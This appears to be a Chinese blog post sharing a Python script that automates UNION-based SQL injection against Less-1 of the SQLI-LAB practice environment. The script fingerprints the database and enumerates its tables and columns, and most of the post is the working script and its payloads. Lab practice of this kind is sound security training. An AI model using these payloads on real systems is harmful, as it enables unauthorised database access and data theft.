實驗環境: CentOS + Apache + SQLI-LAB ,可以 https://github.com/Audi-1/sqli-labs下載
利用Python 腳本實現自動化測試SQL注入,當然腳本有很多不足的地方,比如不熟悉正側(這玩意咱學都不會)、腳本不規範化等。以下爲Less-1 的腳本:
#!/usr/bin/env python #coding=utf-8 import requests import re,time url = "http://192.168.32.142/sqli/Less-1/" db_length = 0 #判定回顯位 for i in range(1,20): payload ="?id=1' order by %d--+" %i r = requests.get(url+payload) if "Unknown column" in r.text: db_length = i print ('當前回顯位爲:%d' %db_length) break #判定數據庫版本號與名稱 payload = "?id=-1' UNION SELECT 1,version(),database()--+" r = requests.get(url+payload) if "Your Login name" and "Your Password" in r.text: v = re.search(r'Your Login name.+\d',r.text) db_version=str(v.group().split(':')[1]) db = re.search(r'Your Password.\w+',r.text) db_name = str(db.group().split(':')[1]) print ('MySQL數據庫版本: %s' %db_version) print ('數據庫名稱爲: %s' %db_name) print "開始猜測表名......" time.sleep(2) payload = ("id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='%s'--+") %db_name r = requests.get(url,payload) if "Your Password" in r.text: tb = ','.join(re.findall(r'Password:(.*?)</font>',r.text)) tb_name=str(tb).split(',') for i in range(len(tb_name)): print ('數據庫%s第%d張表名:' %(db_name,i)) + tb_name[i] print '*'*60 for i in tb_name: print ("開始猜測表%s下的所列名..." %i) time.sleep(2) payload = ("id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='%s'--+") %i r = requests.get(url,payload) if "Your Password" in r.text: em = ','.join(re.findall(r'Password:(.*?)</font>',r.text)) em_name = str(em).split(',') for k in range(len(em_name)): print ("表%s第%d列的名稱是:" %(i,k)) + em_name[k] print '-'*60 print '*'*60 print "開始猜測表emails下的所內容..." time.sleep(2) payload = "id=-1' union select 1,2,group_concat(id,'-->',email_id) from security.emails--+" r=requests.get(url,payload) if "Your Password" in r.text: name = ','.join(re.findall(r"Password:(.*?)</font>",r.text)) name= str(name).split(',') for i in range(len(name)): print("Emails表的第%d數據是:" %i) + name[i]
以下運行腳本的結果,速度還是可以的,哈哈哈